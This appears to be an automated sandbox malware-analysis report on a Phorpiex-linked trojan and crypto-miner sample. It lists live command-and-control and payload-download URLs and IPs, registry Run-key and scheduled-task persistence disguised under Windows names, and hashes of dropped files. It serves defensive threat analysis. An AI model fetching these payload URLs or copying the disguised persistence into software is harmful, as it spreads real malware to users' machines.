http://185.215.113.66/1L	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.84/nxmr.exeOE	1332331323.exe, 0000001D.00000002.1982106656.0000000001602000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/21	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.141/dwntblk	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/46/4sysmain.sdp	sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s	1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	false		unknown
http://91.202.233.141/dwntblONTD~1	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1NNC:	sysppvrdnvs.exe, 00000006.00000003.1606769387.000000000368C000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2087225373.000000000353E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://twizt.net/peinstall.phpBU	70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://twizt.net/peinstall.phpoU_	70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://91.202.233.141/1e	sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.202.233.141/sg	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1C:	sysppvrdnvs.exe, 00000006.00000003.1609744696.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000003.1610746770.0000000003669000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/1dler	sysppvrdnvs.exe, 00000006.00000003.1609744696.0000000000596000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c	1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	false		unknown
http://185.215.113.66/5C:	sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://xmrig.com/docs/algorithms	winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 0000002E.00000002.2067077461.000002949F531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AD41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://twizt.net/newtpp.exeP0	T52Z708x2p.exe, 00000001.00000003.1397236158.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp, 70AF.exe, 00000004.00000000.1396259523.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp	true		unknown
http://185.215.113.66/tdrp.exe	sysppvrdnvs.exe	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.66	twizt.net	Portugal	206894	WHOLESALECONNECTIONSNL	true
87.237.236.86	unknown	Uzbekistan	39032	ISPETCUZ	true
198.163.200.67	unknown	United States	7029	WINDSTREAMUS	false
109.165.55.243	unknown	Russian Federation	12389	ROSTELECOM-ASRU	true
213.230.124.7	unknown	Uzbekistan	8193	BRM-ASUZ	false
88.204.217.130	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
195.158.16.52	unknown	Uzbekistan	8193	BRM-ASUZ	true
213.206.50.15	unknown	Uzbekistan	29385	BUZTON-JV-ASUZ	true
175.107.23.112	unknown	Pakistan	23888	NTC-AS-APNationalTelecommunicationCorporationHQPK	true
95.59.62.94	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
91.202.233.141	unknown	Russian Federation	9009	M247GB	true
195.190.112.66	unknown	Russian Federation	3216	SOVAM-ASRU	true
213.230.67.151	unknown	Uzbekistan	8193	BRM-ASUZ	false
90.156.162.79	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	true
175.106.46.94	unknown	Afghanistan	55424	INSTATELECOM-AS-APInstatelecomLimitedAF	true
5.235.173.196	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
185.71.152.222	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
185.215.113.84	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
2.179.178.50	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
95.188.243.246	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
198.163.193.12	unknown	United States	7029	WINDSTREAMUS	false
5.234.49.217	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
217.24.149.46	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
77.240.41.3	unknown	Kazakhstan	41371	BIKADAKZ	false
94.230.237.65	unknown	Uzbekistan	29385	BUZTON-JV-ASUZ	false
146.70.53.161	unknown	United Kingdom	2018	TENET-1ZA	true
185.203.237.213	unknown	Russian Federation	44493	CHELYABINSK-SIGNAL-ASRU	true
124.109.48.132	unknown	Pakistan	23674	NAYATEL-PKNayatelPvtLtdPK	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
178.71.163.141	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
78.39.226.153	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542688
Start date and time:	2024-10-26 07:25:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	68
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	T52Z708x2p.exe renamed because original name is a hash value
Original Sample Name:	ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@105/57@2/31
EGA Information:	Successful, ratio: 76.5%
HCA Information:	Successful, ratio: 84% Number of executed functions: 123 Number of non-executed functions: 251
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 20.109.209.108
Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, slscr.update.microsoft.com, www.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 2448028260.exe, PID 7376 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4708 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
Execution Graph export aborted for target winupsecvmgr.exe, PID 6256 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:26:38	API Interceptor	40x Sleep call for process: sysppvrdnvs.exe modified
01:26:39	API Interceptor	90x Sleep call for process: powershell.exe modified
01:27:59	API Interceptor	52x Sleep call for process: conhost.exe modified
07:26:38	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysppvrdnvs.exe
07:27:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Users\user\sysppvrdnvs.exe
07:27:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Users\user\sysppvrdnvs.exe
07:27:35	Task Scheduler	Run new task: Microsoft Windows Security path: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.66	thcdVit1dX.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/3
	bBcZoComLl.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/4
	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/5
	dgiX55cHyU.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/5
	GGXhCiYFBw.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/5
	0NSjUT34gS.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/5
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/3
	SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/2
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/6
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/1
87.237.236.86	SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe	Get hash	malicious	Phorpiex	Browse
213.230.124.7	bomb.exe	Get hash	malicious	Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar	Browse
213.206.50.15	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
twizt.net	thcdVit1dX.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	dgiX55cHyU.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	qRavA0Sorz.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	qRavA0Sorz.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	BFP2Kvubpo.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	WI6a5vSCOb.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	xJd712XMG6.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
twizthash.net	bBcZoComLl.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	dgiX55cHyU.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	GGXhCiYFBw.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	0NSjUT34gS.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	1mqzOM6eok.exe	Get hash	malicious	Xmrig	Browse	185.215.113.66

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WINDSTREAMUS	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	162.39.136.54
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	98.23.44.145
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	216.215.215.147
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	64.118.136.21
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	98.19.174.144
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	209.178.181.240
	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	75.91.53.91
	botnet.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	173.186.46.250
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	216.245.28.77
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	72.242.215.117
ROSTELECOM-ASRU	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	46.48.232.73
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	176.51.230.78
	botnet.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	92.126.102.132
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	92.125.198.144
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	92.100.150.85
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	78.36.130.154
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	46.48.232.93
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	178.234.186.86
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	178.67.138.91
	3HOhJoCrj5.elf	Get hash	malicious	Unknown	Browse	37.23.212.249
ISPETCUZ	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	89.236.218.158
	dgiX55cHyU.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	217.30.162.37
	GGXhCiYFBw.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	217.30.163.15
	file.exe	Get hash	malicious	Phorpiex	Browse	217.30.160.219
	SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe	Get hash	malicious	Phorpiex	Browse	87.237.236.86
	file.exe	Get hash	malicious	Phorpiex	Browse	87.237.234.24
	file.exe	Get hash	malicious	Phorpiex	Browse	87.237.234.23
	file.exe	Get hash	malicious	Phorpiex	Browse	217.30.162.37
	SecuriteInfo.com.Trojan.DownLoader46.2135.4279.14770.exe	Get hash	malicious	Phorpiex	Browse	217.30.162.37
	SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	89.236.218.4
WHOLESALECONNECTIONSNL	thcdVit1dX.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	Us051y7j25.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	bBcZoComLl.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	dgiX55cHyU.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	GGXhCiYFBw.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	0NSjUT34gS.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	1mqzOM6eok.exe	Get hash	malicious	Xmrig	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe	thcdVit1dX.exe	Get hash	malicious	Phorpiex	Browse
	dgiX55cHyU.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	bomb.exe	Get hash	malicious	Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar	Browse
	Setup.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\158238779.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\158238779.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\193938922.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\193938922.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\1[1]

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\3[1]

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	16128
Entropy (8bit):	7.988295567506313
Encrypted:	false
SSDEEP:	384:LrvXDxrJBiEAkcXzGE+qHYhew/F2Nyoot52DzPW7L:LrvXVJ0MUzj+qH6T2Uoot8DzPu
MD5:	1568EFB715BD9797610F55AA48DFB18E
SHA1:	076C40D61A821CF3069508EE873F3D4780774CB3
SHA-256:	F42EF51C4C7C8F607A0405848593369BFC193B771E8ED687540632CAD1376216
SHA-512:	03D4357A8A1FAA9110FB023E4C504BCB284D6665848C2918A543C1928FFAC78FDF573D201932517C23A22A6E50C3DDD9D9035BBF8E735DDAE3BC0FEA8949F7E8
Malicious:	false
Preview:	..[...y.M...x..3+_[./.C.........L..I.........K0p.Pa..G.j.q..r..>.+"M.(....).....nf.....+.m...8`....@.'V...]_...{.1.&......$..".....L+.'l.5........]1Z.!H.\|...J.!./.=:jr~.2..T..^R..!t.t..3%_./:.p..@..Z-......9.....aS@..T..x.\...:....).'....D.....A...Ut...R-g.Z>..B.....q.5:9..*.y.nz.4.^...y.n..w.6_.....M7.2..p.jJt.#e.z.SW.h....4{.q.../..br.( o....l.......S..u5nw..;.i#:...X<<T.>.c.R.f.z.gz...D.G......:].....]G.=...s...u.`#Zt...9X.w4.8..~.$YJ.<.....0..}.~...,4..S....J...GJwz.b....yt..;..9...C...#.<$............v....@.0.....`../.".8.b.n...,..]..E-.Vp..Yc....Ga:.q.2o.W..O...........,.N.3#@m..y1.....~-I...-..!m..<fa..^a.k=..Fze..Mq./...(.\..R\)...Kw..x..l.M.7L.........D.. ........G+..m..\.E~......X..t:....\|2.E..X......<\..P3,q.D.x.R..G..,~...Ta...Z...~v.{.....z.J[.a..$.y...#..g.R.<....v...\.>....cjn.)?..k.....S..x.P.0....7.@...P..e@....Z.L6....Rv.oe.x.X..OK4......F....o.r'A.8K.%?R...tG..V...B}c7.!8.............=f....&dI$..W..b.O....dh.......}..N.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\5[1]

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	13568
Entropy (8bit):	7.983903730756248
Encrypted:	false
SSDEEP:	384:vxmO6QJvutiOSVu3UG1aPa7VaRNCf9hFsczcDZF:v76avEi/iOPa7ocHgL
MD5:	ED9F31BD89B04A64ED7EAC4F9F869F0F
SHA1:	2696ECA64C0461F82037981F81E176895EC01D19
SHA-256:	20A8FB765DB33C4E77824C30FD6D5ECA24495E3EB9919D2EDEEB80B6B9B7208D
SHA-512:	C160C282A48CD0358B0D3F49910D3C9C99B4F126E34E2494AD4E839EDE7058B79B56F84C020FEE6F7DFA9259853AAE750AF52DCCA6AACF822F7121F26BE04205
Malicious:	false
Preview:	....=....$6K.bMU...{..........qg.....z{V....U..W.....D..W.....}P]s.TK.....3ZW%z...h".......eRb#mH.c,....~ .\|Q...p....[.W.;..!.i"R...AB.tF...js..._K..(.5.j....R,.W...eAD.n.~Z8.:p...^5C.LV....`.......Y......u.W.>t...y..\'J............0.4.?=.H.Tic8..1....;V.S.\|.....T.h...yT.+m.....q.BLk..O...!...{..L..bR.....<.W.P.O...(r....V.c.......=..Tb'..........'+DZ.E"rJ.:..h}...n.w.1..~..z.:/.;fw.....H.`.^.D...\|.....%.......F.......8.M.D........)..A._.u..hi.\:..h.%.~...!a.>.&..cbV.)g.$.V......]...B..g......1.v.@...%....<.+(.{.P..s.....?.'.f#.....[..V.>%}sK..u..~g..W....A0..9....-.#98.w..S..Kf.vZ.g...i<).X.>r.R.j9...[t...6...'G..*.......\.3...+veY..h_9^H......-..'BI..h=..M8....Nz.-n...t>...+......yJ.MpW...PL.k..Py....W.."y....~.&..ecMz..6..s.C!.J`..mS?.2.."..O..R....]N 